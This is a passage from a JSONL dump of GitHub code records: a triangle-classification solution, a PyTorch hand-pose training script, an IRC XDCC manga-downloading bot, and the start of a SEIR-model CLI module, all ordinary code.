data.sort()\r\n if data[2] >= data[0] + data[1]:\r\n print('Invalid')\r\n else:\r\n if data[0] == data[2]:\r\n print('Equilateral')\r\n elif (data[0] == data[1]) or (data[1] == data[2]):\r\n print('Isosceles')\r\n else:\r\n print('Scalene')","repo_name":"jwshin0908/Algorithm","sub_path":"백준/Bronze/5073. 삼각형과 세 변/삼각형과 세 변.py","file_name":"삼각형과 세 변.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72700704087","text":"'''\ntraining\n'''\nimport argparse\nimport os\n\nimport random\nimport progressbar\nimport time\nimport logging\nimport pdb\nfrom tqdm import tqdm\nimport numpy as np\nimport scipy.io as sio\nimport importlib\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nimport torch.utils.data\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom dataset_msra import HandPointDataset\n\nfrom utils import rotate_point_cloud_by_angle_flip, rotate_point_cloud_by_angle_nyu, rotate_point_cloud_by_angle_xyz\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--batchSize', type=int, default=32, help='input batch size')\nparser.add_argument('--workers', type=int, default=0, help='number of data loading workers')\nparser.add_argument('--nepoch', type=int, default=160, help='number of epochs to train for')\nparser.add_argument('--ngpu', type=int, default=1, help='# GPUs')\nparser.add_argument('--main_gpu', type=int, default=0, help='main GPU id') # CUDA_VISIBLE_DEVICES=0 python train.py\n\nparser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate at t=0')\nparser.add_argument('--momentum', type=float, default=0.9, help='momentum (SGD only)')\nparser.add_argument('--weight_decay', type=float, default=0.05, help='weight decay (SGD only)')\nparser.add_argument('--learning_rate_decay', type=float, default=1e-7, help='learning rate decay')\n\nparser.add_argument('--size', type=str, default='full', help='how many samples do we load: small | full')\nparser.add_argument('--SAMPLE_NUM', type=int, default = 1024, help='number of sample points')\nparser.add_argument('--bit_width', type=int, default=4, help='quantize for bit width')\nparser.add_argument('--JOINT_NUM', type=int, default = 21, help='number of joints')\nparser.add_argument('--INPUT_FEATURE_NUM', type=int, default = 3, help='number of input point features')\nparser.add_argument('--iters', type=int, default = 3, help='start epoch')\n\nparser.add_argument('--start_epoch', type=int, default = 0, help='start epoch')\nparser.add_argument('--test_index', type=int, default = 0, help='test index for cross validation, range: 0~8')\nparser.add_argument('--save_root_dir', type=str, default='results', help='output folder')\nparser.add_argument('--model', type=str, default = '', help='model name for training resume')\nparser.add_argument('--optimizer', type=str, default = '', help='optimizer name for training resume')\n\nparser.add_argument('--dataset', type=str, default = 'nyu', help='optimizer name for training resume')\nparser.add_argument('--dataset_path', type=str, default = '/workspace/HandFoldDynGraph/data/NYU/process_nyu_center_rot0_2048_com/Training', help='model name for training resume')\nparser.add_argument('--test_path', type=str, default = '/workspace/HandFoldDynGraph/data/NYU/process_nyu_center_com/Testing', help='model name for training resume')\n\n\nparser.add_argument('--model_name', type=str, default = 'rrnn', help='')\nparser.add_argument('--gpu', type=str, default = '0', help='gpu')\n\nopt = parser.parse_args()\n\nmodule = importlib.import_module('network_'+opt.model_name)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=opt.gpu\n\ntorch.cuda.set_device(opt.main_gpu)\n\nopt.manualSeed = 1\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nif opt.dataset == 'msra':\n\tfrom dataset_msra import subject_names\n\tsave_dir = os.path.join(opt.save_root_dir, opt.dataset+ '_' + opt.model_name+'_'+str(opt.iters)+'iters', subject_names[opt.test_index])\n\topt.JOINT_NUM = 21\nelse:\n\tsave_dir = os.path.join(opt.save_root_dir, opt.dataset+ '_' + opt.model_name+'_'+str(opt.iters)+'iters')\n\tif opt.dataset == 'icvl':\n\t\tfrom dataset_icvl import HandPointDataset\n\t\tfrom dataset_icvl_arm_com import HandPointDatasetArm\n\t\topt.JOINT_NUM = 16\n\telse:\n\t\tfrom dataset_nyu import HandPointDataset\n\t\tfrom dataset_nyu_arm_com import HandPointDatasetArm\n\t\topt.JOINT_NUM = 14\n\n\ndef _debug(model):\n\tmodel = model.netR_1\n\tprint(model.named_paramters())\ntry:\n\tos.makedirs(save_dir)\nexcept OSError:\n\tpass\n\nlogging.basicConfig(format='%(asctime)s %(message)s', datefmt='%Y/%m/%d %H:%M:%S', \\\n\t\t\t\t\tfilename=os.path.join(save_dir, 'train.log'), level=logging.INFO)\nlogging.info('======================================================')\n\n# 1. Load data\nif opt.dataset == 'icvl' or opt.dataset == 'nyu':\t\n\ttrain_data = HandPointDatasetArm(root_path=opt.dataset_path, opt=opt, train = True, sample=2048, output_num=1024)\n\nelse:\t\t\t\t\t\t\t\t\t \n\ttrain_data = HandPointDataset(root_path=opt.dataset_path, opt=opt, train = True)\ntrain_dataloader = torch.utils.data.DataLoader(train_data, batch_size=opt.batchSize,\n\t\t\t\t\t\t\t\t\t\tshuffle=True, num_workers=int(opt.workers), pin_memory=False)\n\ntest_data = HandPointDataset(root_path=opt.test_path, opt=opt, train = False)\ntest_dataloader = torch.utils.data.DataLoader(test_data, batch_size=opt.batchSize,\n\t\t\t\t\t\t\t\t\t\t shuffle=False, num_workers=int(opt.workers), pin_memory=False)\n\nprint('#Train data:', len(train_data), '#Test data:', len(test_data))\nprint (opt)\n\n# 2. Define model, loss and optimizer\nmodel = getattr(module, 'HandModel')(joints=opt.JOINT_NUM, iters=opt.iters)\n\nif opt.ngpu > 1:\n\tmodel.netR_1 = torch.nn.DataParallel(model.netR_1, range(opt.ngpu))\n\tmodel.netR_2 = torch.nn.DataParallel(model.netR_2, range(opt.ngpu))\n\tmodel.netR_3 = torch.nn.DataParallel(model.netR_3, range(opt.ngpu))\nif opt.model != '':\n\tmodel.load_state_dict(torch.load(os.path.join(save_dir, opt.model)))\n\t\nmodel.cuda()\nprint(model)\n\nparameters = model.parameters()\n\ndef smooth_l1_loss(input, target, sigma=10., reduce=True, normalizer=1.0):\n beta = 1. / (sigma ** 2)\n diff = torch.abs(input - target)\n cond = diff < beta\n loss = torch.where(cond, 0.5 * diff ** 2 / beta, diff - 0.5 * beta)\n if reduce:\n return torch.sum(loss) / normalizer\n return torch.sum(loss, dim=1) / normalizer\ncriterion = smooth_l1_loss\n\noptimizer = optim.AdamW(parameters, lr=opt.learning_rate, betas = (0.5, 0.999), eps=1e-06, weight_decay=opt.weight_decay)\nif opt.optimizer != '':\n\toptimizer.load_state_dict(torch.load(os.path.join(save_dir, opt.optimizer)))\nscheduler = lr_scheduler.StepLR(optimizer, step_size=120, gamma=0.1)\nif opt.dataset == 'icvl':\n\tscheduler = lr_scheduler.StepLR(optimizer, step_size=160, gamma=0.1)\nif opt.dataset == 'nyu':\n\tscheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[120, 160], gamma=0.1)\n\ntest_best_error = np.inf\n\n# 3. Training and testing\nfor epoch in range(opt.start_epoch, opt.nepoch):\n\tscheduler.step(epoch)\n\tif opt.dataset == 'msra':\n\t\tprint('======>>>>> Online epoch: #%d, lr=%f, Test: %s <<<<<======' %(epoch, scheduler.get_lr()[0], subject_names[opt.test_index]))\n\telse:\n\t\tprint('======>>>>> Online epoch: #%d, lr=%f <<<<<======' %(epoch, scheduler.get_lr()[0]))\n\n\t# 3.1 switch to train mode\n\ttorch.cuda.synchronize()\n\tmodel.train()\n\ttrain_mse = 0.0\n\ttrain_mse_wld = 0.0\n\ttimer = time.time()\n\n\tfor i, data in enumerate(tqdm(train_dataloader, 0)):\n\t\tif len(data[0]) == 1:\n\t\t\tcontinue\n\t\ttorch.cuda.synchronize() \n\t\t# 3.1.1 load inputs and targets\n\t\tpoints, volume_length, gt_xyz , _= data\n\t\t# gt_pca = Variable(gt_pca, requires_gr,ad=False).cuda()\n\t\tpoints, volume_length, gt_xyz = points.cuda(), volume_length.cuda(), gt_xyz.cuda()\n\n\t\tpermutation = torch.randperm(points.size(1))\n\t\tpoints = points[:,permutation,:]\n\n\t\tpoints, gt_xyz = rotate_point_cloud_by_angle_xyz(points, gt_xyz.view(-1, opt.JOINT_NUM , 3), False)\n\n\t\tshift = ((torch.rand((points.size(0),3)).cuda() * 40. - 20.) / volume_length).view(-1, 1, 3)\n\t\tpoints[:,:,0:3] = points[:,:,0:3] + shift\n\t\tgt_xyz = gt_xyz + shift\n\n\t\tscale = (torch.rand(points.size(0)).cuda() * 0.4 + 0.8).view(-1, 1, 1)\n\t\tpoints = points * scale\n\t\tgt_xyz = gt_xyz * scale\t\t\n\t\t\n\t\tgt_xyz = gt_xyz.view(-1, opt.JOINT_NUM * 3)\n\n\t\t# print(gt_xyz.size())\n\t\t# points: B * 1024 * 6; target: B * 42\n\t\t# 3.1.2 compute output\n\t\toptimizer.zero_grad()\n\n\t\tfolds= model(points.transpose(1,2), points.transpose(1,2))\n\t\testimation = folds[-1]\n\t\tloss = criterion(estimation, gt_xyz)*1\n\t\tfor i in range(len(folds) - 1):\n\n\t\t\tloss += criterion(folds[i], gt_xyz) * (0.8**(len(folds)-i))\n\t\tloss = loss*opt.JOINT_NUM * 3\n\n\t\t# 3.1.3 compute gradient and do SGD step\n\t\tloss.backward()\n\t\toptimizer.step()\n\t\ttorch.cuda.synchronize()\n\t\t\n\t\t# 3.1.4 update training error\n\t\ttrain_mse = train_mse + loss.item()*len(points)\n\t\t\n\t\t# 3.1.5 compute error in world cs \n\t\toutputs_xyz = estimation\n\t\tdiff = torch.pow(outputs_xyz-gt_xyz, 2).view(-1,opt.JOINT_NUM,3)\n\t\tdiff_sum = torch.sum(diff,2)\n\t\tdiff_sum_sqrt = torch.sqrt(diff_sum)\n\t\tdiff_mean = torch.mean(diff_sum_sqrt,1).view(-1,1)\n\t\tdiff_mean_wld = torch.mul(diff_mean,volume_length)\n\t\ttrain_mse_wld = train_mse_wld + diff_mean_wld.sum().item()\n\n\t# time taken\n\ttorch.cuda.synchronize()\n\ttimer = time.time() - timer\n\ttimer = timer / len(train_data)\n\tprint('==> time to learn 1 sample = %f (ms)' %(timer*1000))\n\n\t# print mse\n\ttrain_mse = train_mse / len(train_data)\n\ttrain_mse_wld = train_mse_wld / len(train_data)\n\n\n\tprint('mean-square error of 1 sample: %f, #train_data = %d' %(train_mse, len(train_data)))\n\tprint('average estimation error in world coordinate system: %f (mm)' %(train_mse_wld))\n\n\tif (epoch % 10) == 0:\n\t\ttorch.save(model.state_dict(), '%s/netR_%d.pth' % (save_dir, epoch))\n\t\ttorch.save(optimizer.state_dict(), '%s/optimizer_%d.pth' % (save_dir, epoch))\n\n\t# 3.2 switch to evaluate mode\n\ttorch.cuda.synchronize()\n\tmodel.eval()\n\ttest_mse = 0.0\n\ttest_wld_err = 0.0\n\ttimer = time.time()\n\tfor i, data in enumerate(tqdm(test_dataloader, 0)):\n\t\ttorch.cuda.synchronize()\n\t\twith torch.no_grad():\n\t\t\t# 3.2.1 load inputs and targets\n\t\t\tpoints, volume_length, gt_xyz, _ = data\n\t\t\tpoints, volume_length, gt_xyz = points.cuda(), volume_length.cuda(), gt_xyz.cuda()\n\n\t\t\tfolds= model(points.transpose(1,2), points.transpose(1,2))\n\t\t\testimation = folds[-1]\n\t\t\tloss = criterion(estimation, gt_xyz)*1\n\t\t\tfor i in range(len(folds) - 1):\n\t\t\t\tloss += criterion(folds[i], gt_xyz) * (0.8**(len(folds)-i))\n\t\t\t\t# loss += criterion(folds[i], gt_xyz) * 1\n\t\t\tloss = loss*opt.JOINT_NUM * 3\n\n\t\ttorch.cuda.synchronize()\n\t\ttest_mse = test_mse + loss.item()*len(points)\n\n\t\t# 3.2.3 compute error in world cs \n\t\toutputs_xyz = estimation\n\t\tdiff = torch.pow(outputs_xyz-gt_xyz, 2).view(-1,opt.JOINT_NUM,3)\n\t\tdiff_sum = torch.sum(diff,2)\n\t\tdiff_sum_sqrt = torch.sqrt(diff_sum)\n\t\tdiff_mean = torch.mean(diff_sum_sqrt,1).view(-1,1)\n\t\tdiff_mean_wld = torch.mul(diff_mean,volume_length)\n\t\ttest_wld_err = test_wld_err + diff_mean_wld.sum().item()\n\n\tif test_best_error > test_wld_err:\n\t\ttest_best_error = test_wld_err\n\t\ttorch.save(model.state_dict(), '%s/best_model.pth' % (save_dir))\n\t\ttorch.save(optimizer.state_dict(), '%s/best_optimizer.pth' % (save_dir))\n\t\t\t\t\n\t# time taken\n\ttorch.cuda.synchronize()\n\ttimer = time.time() - timer\n\ttimer = timer / len(test_data)\n\tprint('==> time to learn 1 sample = %f (ms)' %(timer*1000))\n\t# print mse\n\ttest_mse = test_mse / len(test_data)\n\tprint('mean-square error of 1 sample: %f, #test_data = %d' %(test_mse, len(test_data)))\n\ttest_wld_err = test_wld_err / len(test_data)\n\tprint('average estimation error in world coordinate system: %f (mm)' %(test_wld_err))\n\t# log\n\tlogging.info('Epoch#%d: train error=%e, train wld error = %f mm, test error=%e, test wld error = %f mm, best wld error = %f, lr = %f' %(epoch, train_mse, train_mse_wld, test_mse, test_wld_err, test_best_error / len(test_data), scheduler.get_lr()[0]))","repo_name":"cwc1260/HandR2N2","sub_path":"train_rrnn.py","file_name":"train_rrnn.py","file_ext":"py","file_size_in_byte":11466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12651998641","text":"\n\nimport MangaCMSOld.ScrapePlugins.MangaScraperDbBase\nimport MangaCMSOld.ScrapePlugins.RetreivalBase\nimport MangaCMSOld.ScrapePlugins.M.IrcGrabber.IrcBot\nimport irc.client\n\nimport threading\nimport nameTools as nt\nimport settings\nimport os\nimport os.path\nimport time\nimport json\nimport runStatus\nimport traceback\n\nimport MangaCMSOld.cleaner.processDownload\n\nimport abc\n\nclass DbWrapper(MangaCMSOld.ScrapePlugins.RetreivalBase.RetreivalBase):\n\n\tpluginName = \"IrcDb Wrapper\"\n\tpluginType = \"IrcContentRetreiver\"\n\n\tloggerPath = \"Main.Manga.IRC.db\"\n\n\tdbName = settings.DATABASE_DB_NAME\n\ttableName = \"MangaItems\"\n\n\t@abc.abstractmethod\n\tdef tableKey(self):\n\t\tpass\n\n\t# override __init__, catch tabkeKey value, call parent __init__ with the rest of the args\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(DbWrapper, self).__init__(*args, **kwargs)\n\n\t# Have to define go (it's abstract in the parent). We're never going to call it, though.\n\tdef go(self):\n\t\tpass\n\tdef getLink(self):\n\t\tpass\n\n\n\tdef retreiveTodoLinkFromDB(self):\n\n\t\tself._resetStuckItems()\n\t\tself.log.info( \"Fetching items from db...\",)\n\n\t\trows = self.getRowsByValue(dlState=0)\n\n\t\trows = sorted(rows, key=lambda k: k[\"retreivalTime\"], reverse=True)\n\n\t\tself.log.info( \"Done\")\n\t\tif not rows:\n\t\t\tself.log.info(\"No new items, nothing to do.\")\n\t\t\treturn None\n\n\n\t\tself.log.info( \"Have %s new items to retreive in IrcDownloader\" % len(rows))\n\n\t\t# Each call returns one item.\n\t\titem = rows.pop(0)\n\n\t\titem[\"retreivalTime\"] = time.gmtime(item[\"retreivalTime\"])\n\n\t\treturn item\n\n\n\tdef getDownloadPath(self, item, fName):\n\n\t\tif not item['seriesName']:\n\t\t\tself.log.info(\"No series set for item. Guessing from filename:\")\n\t\t\tself.log.info(\"Filename = '%s'\", fName)\n\t\t\tbareName = nt.guessSeriesFromFilename(fName)\n\n\t\t\t# if not matchName or not matchName in nt.dirNameProxy:\n\t\t\tif not nt.haveCanonicalMangaUpdatesName(bareName):\n\t\t\t\titem[\"seriesName\"] = settings.ircBot[\"unknown-series\"]\n\t\t\telse:\n\t\t\t\titem[\"seriesName\"] = nt.getCanonicalMangaUpdatesName(bareName)\n\n\t\t\tself.log.info(\"Guessed = '%s'. Updating series information\", item['seriesName'])\n\t\t\tself.updateDbEntry(item[\"sourceUrl\"], seriesName=item[\"seriesName\"])\n\n\n\t\tdlPath, newDir = self.locateOrCreateDirectoryForSeries(item[\"seriesName\"])\n\n\t\tif item[\"flags\"] == None:\n\t\t\titem[\"flags\"] = \"\"\n\n\t\tif newDir:\n\t\t\tself.updateDbEntry(item[\"sourceUrl\"], flags=\" \".join([item[\"flags\"], \"haddir\"]))\n\n\t\tfqFName = os.path.join(dlPath, fName)\n\n\t\tloop = 1\n\n\t\tfName, ext = os.path.splitext(fName)\n\n\t\twhile os.path.exists(fqFName):\n\t\t\tfName = \"%s - (%d).%s\" % (fName, loop, ext)\n\t\t\tfqFName = os.path.join(dlPath, fName)\n\t\t\tloop += 1\n\t\tself.log.info(\"Saving to archive = %s\", fqFName)\n\n\n\t\tself.updateDbEntry(item[\"sourceUrl\"], downloadPath=dlPath, fileName=fName, originName=fName)\n\n\t\treturn fqFName\n\n\nclass DbXdccWrapper(DbWrapper):\n\ttableKey = \"irc-irh\"\n\n\tdef __init__(self, log_suffix):\n\t\tself.loggerPath = self.loggerPath + \"<{}>\".format(log_suffix)\n\t\tsuper().__init__()\n\nclass DbTriggerWrapper(DbWrapper):\n\ttableKey = \"irc-trg\"\n\n\tdef __init__(self, log_suffix):\n\t\tself.loggerPath = self.loggerPath + \"<{}>\".format(log_suffix)\n\t\tsuper().__init__()\n\n\n\nclass FetcherBot(MangaCMSOld.ScrapePlugins.M.IrcGrabber.IrcBot.TestBot):\n\n\tdef __init__(self, nickname, realname, server, port=9999):\n\t\tself.xdcc = DbXdccWrapper(server)\n\t\tself.trgr = DbTriggerWrapper(server)\n\n\t\tself.db = None\n\t\tself.run = True\n\n\t\tself.states = [\"idle\", \"xdcc requested\", \"xdcc receiving\", \"xdcc finished\", \"xdcc failed\"]\n\t\tself.state = \"idle\"\n\n\t\tself.currentItem = None\n\t\tself.todo = []\n\n\t\tself.base_channels = ['#madokami']\n\n\t\tself.timer = None\n\n\t\t# Time to wait between requesting someing over XDCC, and marking the request as failed due to timeout\n\t\tself.xdcc_wait_time = 120\n\n\t\tsuper(FetcherBot, self).__init__(nickname, realname, server, port)\n\n\n\tdef get_filehandle(self, fileName):\n\t\t# We're already receiving the file at this point, apparently.\n\t\tif self.state != \"xdcc requested\":\n\t\t\tself.log.error(\"DCC SEND Received when not waiting for DCC transfer! Current state = %s\", self.state)\n\t\t\treturn False\n\n\n\n\t\tfqFName, ext = os.path.splitext(fileName)\n\t\tfileName = \"%s [IRC]%s\" % (fqFName, ext)\n\n\t\tself.currentItem[\"downloadPath\"] = self.db.getDownloadPath(self.currentItem, fileName)\n\t\treturn open(self.currentItem[\"downloadPath\"], \"wb\")\n\n\tdef xdcc_receive_start(self):\n\t\tif not self.currentItem:\n\t\t\tself.log.error(\"DCC Receive start when no item requested?\")\n\t\t\tself.changeState(\"idle\")\n\t\t\treturn False\n\t\tif not self.checkState(\"xdcc requested\"):\n\t\t\tself.log.error(\"XDCC Transfer started when it was not requested!\")\n\t\t\tself.changeState(\"idle\")\n\t\t\treturn False\n\t\tself.log.info(\"XDCC Transfer starting!\")\n\n\t\tself.changeState(\"xdcc receiving\")\n\t\treturn True\n\n\t\t# Intercept on on_ctcp, so we can catch errors there (connection failures, etc...)\n\tdef on_ctcp(self, c, e):\n\t\ttry:\n\t\t\tsuper().on_ctcp(c, e)\n\t\texcept (ConnectionRefusedError, irc.client.DCCConnectionError):\n\t\t\tself.log.error(\"Failed to establish DCC connection!\")\n\t\t\tself.log.error(traceback.format_exc())\n\t\t\tself.changeState(\"xdcc failed\")\n\n\tdef on_dccmsg(self, c, e):\n\t\tif not self.checkState(\"xdcc requested\") and \\\n\t\t\tnot self.checkState(\"xdcc receiving\"):\n\t\t\tself.log.error(\"DCC Message when not receiving data!\")\n\t\t\ttry:\n\t\t\t\tself._dcc_disconnect(c, e)\n\t\t\texcept ValueError:\n\t\t\t\tself.log.error(\"Connection not yet open, cannot close\")\n\n\t\telse:\n\t\t\tsuper().on_dccmsg(c, e)\n\n\n\tdef xdcc_receive_finish(self):\n\t\tself.log.info(\"XDCC Transfer starting!\")\n\t\tself.changeState(\"xdcc finished\")\n\n\n\t\tdedupState = MangaCMSOld.cleaner.processDownload.processDownload(self.currentItem[\"seriesName\"], self.currentItem[\"downloadPath\"], deleteDups=True)\n\t\tself.log.info( \"Done\")\n\n\t\tself.db.addTags(dbId=self.currentItem[\"dbId\"], tags=dedupState)\n\t\tif dedupState != \"damaged\":\n\t\t\tself.db.updateDbEntry(self.currentItem[\"sourceUrl\"], dlState=2)\n\t\telse:\n\t\t\tself.db.updateDbEntry(self.currentItem[\"sourceUrl\"], dlState=-10)\n\n\n\tdef checkState(self, checkState):\n\t\tif not checkState in self.states:\n\t\t\traise ValueError(\"Tried to set check if invalid state! Invalid state state = %s\" % checkState)\n\t\treturn self.state == checkState\n\n\tdef changeState(self, newState):\n\t\tif not newState in self.states:\n\t\t\traise ValueError(\"Tried to set invalid state! New state = %s\" % newState)\n\t\tself.log.info(\"State changing to %s from %s\", newState, self.state)\n\t\tself.state = newState\n\n\tdef requestItem(self, reqItem):\n\n\t\tinfo = json.loads(reqItem[\"sourceId\"])\n\t\treqItem[\"info\"] = info\n\t\t# print(\"info\", info[\"fName\"])\n\n\n\t\tif not \"#\"+reqItem[\"info\"][\"channel\"] in self.channels:\n\t\t\tself.log.info(\"Need to join channel %s\", reqItem[\"info\"][\"channel\"])\n\t\t\tself.log.info(\"Already on channels %s\", self.channels)\n\t\t\tself.connection.join(\"#\"+reqItem[\"info\"][\"channel\"])\n\t\t\ttime.sleep(3)\n\t\tself.log.info(\"Joined channels %s\", self.channels)\n\n\t\tself.currentItem = reqItem\n\t\tself.changeState(\"xdcc requested\")\n\t\treqStr = \"xdcc send %s\" % reqItem[\"info\"][\"pkgNum\"]\n\t\tself.connection.privmsg(reqItem[\"info\"][\"botName\"], reqStr)\n\t\tself.log.info(\"Request = '%s - %s'\", reqItem[\"info\"][\"botName\"], reqStr)\n\n\t\tself.db.updateDbEntry(reqItem[\"sourceUrl\"], seriesName=reqItem[\"seriesName\"], dlState=1)\n\n\tdef triggerItem(self, reqItem):\n\n\t\tinfo = json.loads(reqItem[\"sourceId\"])\n\t\tprint(\"reqItem = \", reqItem)\n\t\tprint(\"Item = \", info)\n\n\t\tif not \"#\"+info[\"channel\"] in self.channels:\n\t\t\tself.log.info(\"Need to join channel %s\", info[\"channel\"])\n\t\t\tself.log.info(\"Already on channels %s\", self.channels)\n\t\t\tself.connection.join(\"#\"+info[\"channel\"])\n\t\t\ttime.sleep(3)\n\n\t\tself.currentItem = reqItem\n\t\tself.changeState(\"xdcc requested\")\n\t\tself.connection.privmsg(\"#\"+info[\"channel\"], info['trigger'])\n\t\tself.log.info(\"Sending trigger '%s' to '%s'\", info['trigger'], info[\"channel\"])\n\n\t\tself.db.updateDbEntry(reqItem[\"sourceUrl\"], dlState=1)\n\n\tdef markDownloadFailed(self):\n\t\tself.log.error(\"Timed out on XDCC Request!\")\n\t\tself.log.error(\"Failed item = '%s'\", self.currentItem)\n\t\tself.db.updateDbEntry(self.currentItem[\"sourceUrl\"], dlState=-1)\n\t\tself.currentItem = None\n\n\n\tdef markDownloadFinished(self):\n\t\tself.log.info(\"XDCC Finished!\")\n\t\tself.log.info(\"Item = '%s'\", self.currentItem)\n\n\t\tself.currentItem = None\n\t\tself.received_bytes = 0\n\n\n\tdef stepStateMachine(self):\n\t\tif self.state == \"idle\":\n\t\t\ttodo = self.xdcc.retreiveTodoLinkFromDB()\n\t\t\tif todo: # Have something to download via XDCC\n\t\t\t\tself.db = self.xdcc\n\t\t\t\tself.requestItem(todo)\n\t\t\t\tself.timer = time.time()\n\t\t\t\treturn\n\n\t\t\ttodo = self.trgr.retreiveTodoLinkFromDB()\n\t\t\tif todo: # Have something to download via Trigger\n\t\t\t\tself.db = self.trgr\n\t\t\t\tself.triggerItem(todo)\n\t\t\t\tself.timer = time.time()\n\t\t\t\treturn\n\n\t\t\t# sleep 30 minutes if there was nothing to do.\n\t\t\tfor x in range(30*60):\n\t\t\t\ttime.sleep(1)\n\t\t\t\tif not runStatus.run:\n\t\t\t\t\tbreak\n\n\t\telif self.state == \"xdcc requested\":\n\t\t\tif time.time() - self.timer > self.xdcc_wait_time:\n\t\t\t\tself.changeState(\"xdcc failed\")\n\n\t\telif self.state == \"xdcc receiving\": # Wait for download to finish\n\t\t\tpass\n\n\t\telif self.state == \"xdcc finished\": # Wait for download to finish\n\t\t\tself.markDownloadFinished()\n\t\t\tself.changeState(\"idle\")\n\n\t\telif self.state == \"xdcc failed\": # Wait for download to finish\n\t\t\tself.markDownloadFailed()\n\t\t\tself.changeState(\"idle\")\n\n\n\tdef processQueue(self):\n\t\tif not self.run:\n\t\t\tself.die(\"Whoops, herped my derp.\")\n\n\t\t# self.log.info(\"QueueProcessor\")\n\t\tif self.state != \"idle\" and self.received_bytes != 0:\n\t\t\tself.log.info(\"Current state = %s, rec bytes = %s\", self.state, self.received_bytes)\n\t\tself.stepStateMachine()\n\n\tdef welcome_func(self, c, e):\n\t\t# Tie periodic calls to on_welcome, so they don't back up while we're connecting.\n\n\t\tself.reactor.execute_every(2.5, self.processQueue)\n\t\tself.log.info(\"IRC Interface connected to server %s\", self.server_list)\n\n\n\t\tfor channel in self.base_channels:\n\t\t\tif not channel in self.channels:\n\t\t\t\tself.log.info(\"Need to join: %s\", channel)\n\t\t\t\tself.connection.join(channel)\n\n\n\nclass IrcRetreivalInterface(object):\n\tdef __init__(self):\n\t\tirc_highway_server = \"irc.irchighway.net\"\n\t\tirc_rizon_server = \"irc.rizon.net\"\n\n\t\tself.irc_highway_bot = FetcherBot(settings.ircBot[\"name\"], settings.ircBot[\"rName\"], irc_highway_server)\n\t\tself.rizon_bot = FetcherBot(settings.ircBot[\"name\"], settings.ircBot[\"rName\"], irc_rizon_server)\n\n\tdef startBot(self):\n\n\t\tself.irc_highway_Thread = threading.Thread(target=self.irc_highway_bot.startup)\n\t\tself.irc_highway_Thread.start()\n\n\t\tself.irc_rizon_Thread = threading.Thread(target=self.rizon_bot.startup)\n\t\tself.irc_rizon_Thread.start()\n\n\tdef stopBot(self):\n\t\tprint(\"Calling stopBot\")\n\t\tself.irc_highway_bot.run = False\n\t\tself.rizon_bot.run = False\n\t\tprint(\"StopBot Called\")\n\n\n\n\n\nif __name__ == \"__main__\":\n\timport MangaCMSOld.lib.logSetup\n\timport signal\n\n\n\trunner = IrcRetreivalInterface()\n\n\tdef signal_handler(dummy_signal, dummy_frame):\n\t\tif runStatus.run:\n\t\t\trunStatus.run = False\n\t\t\trunner.stopBot()\n\t\t\tprint(\"Telling threads to stop\")\n\t\telse:\n\t\t\tprint(\"Multiple keyboard interrupts. Raising\")\n\t\t\traise KeyboardInterrupt\n\n\n\tsignal.signal(signal.SIGINT, signal_handler)\n\tMangaCMSOld.lib.logSetup.initLogging()\n\n\n\trunner.startBot()\n\n\n\n","repo_name":"herp-a-derp/MangaCMS","sub_path":"MangaCMSOld/ScrapePlugins/M/IrcGrabber/FetchBot.py","file_name":"FetchBot.py","file_ext":"py","file_size_in_byte":11184,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"35328281690","text":"import numpy as np\nimport json\n\nfrom pathlib import Path\nfrom dataclasses import dataclass, field, asdict\nfrom typing import List, Optional, Union\n\nfrom seir.defaults import (\n NB_SAMPLES_DEFAULT,\n NB_RUNS_DEFAULT,\n AGE_GROUPS_DEFAULT,\n R0_DEFAULT,\n REL_BETA_LOCKDOWN_DEFAULT,\n REL_BETA_PERIOD_DEFAULT,\n REL_BETA_ASYMPTOMATIC_DEFAULT,\n PROP_A_DEFAULT,\n PROP_S_DEFAULT,\n PROP_S_TO_H_DEFAULT,\n PROP_H_TO_C_DEFAULT,\n PROP_H_TO_D_DEFAULT,\n PROP_C_TO_D_DEFAULT,\n TIME_INCUBATE_DEFAULT,\n TIME_INFECTIOUS_DEFAULT,\n TIME_S_TO_H_DEFAULT,\n TIME_S_TO_C_DEFAULT,\n TIME_H_TO_C_DEFAULT,\n TIME_H_TO_R_DEFAULT,\n TIME_H_TO_D_DEFAULT,\n TIME_C_TO_R_DEFAULT,\n TIME_C_TO_D_DEFAULT,\n CONTACT_K_DEFAULT,\n HOSPITAL_LOADING_DEFAULT,\n MORTALITY_LOADING_DEFAULT\n)\n\n\ndef list_field(default=None, metadata=None):\n return field(default_factory=lambda: default, metadata=metadata)\n\n\ndef _sample_cli_attr(attr, nb_groups, nb_samples) -> np.ndarray:\n if len(attr) == 1:\n return np.expand_dims(np.asarray(attr[0]), axis=(0, 1))\n elif len(attr) == 2:\n return np.random.uniform(attr[0], attr[1], size=(nb_groups, nb_samples))\n else:\n raise ValueError(f\"Uniform distribution should have two values, a lower and upper bound. Got {len(attr)} \"\n f\"number of parameters instead.\")\n\n\n\nclass BaseCLI:\n \"\"\"\n Base class for all command line interface dataclass objects. These are designed to be used with the\n DataClassArgumentParser object from the seir.argparser module. Contains basic methods that allow the the CLI\n arguments to be saved as a json object or parsed as a json string.\n\n Objects inheriting from this should be a dataclass. Parameters of the inherited objects should be defined as a\n dataclass field, with a dict \"metadata\" being parsed as the kwargs of an argument in pythons built-in argparser\n module.\n \"\"\"\n\n def to_json(self, fp: Union[str, Path]):\n \"\"\"\n Saves the command line interface object to a json file. Only saves the file, will not create any parent\n directories.\n\n Parameters\n ----------\n fp: str, Path\n The file path at which to save the objects json string.\n\n Returns\n -------\n None\n \"\"\"\n if isinstance(fp, str):\n fp = Path(fp)\n if not fp.parent.is_dir():\n raise ValueError(f\"The directory {fp.parent} is not a directory.\")\n\n with fp.open('wb') as f:\n json.dump(asdict(self), f, indent=4)\n\n def to_json_string(self) -> str:\n \"\"\"\n 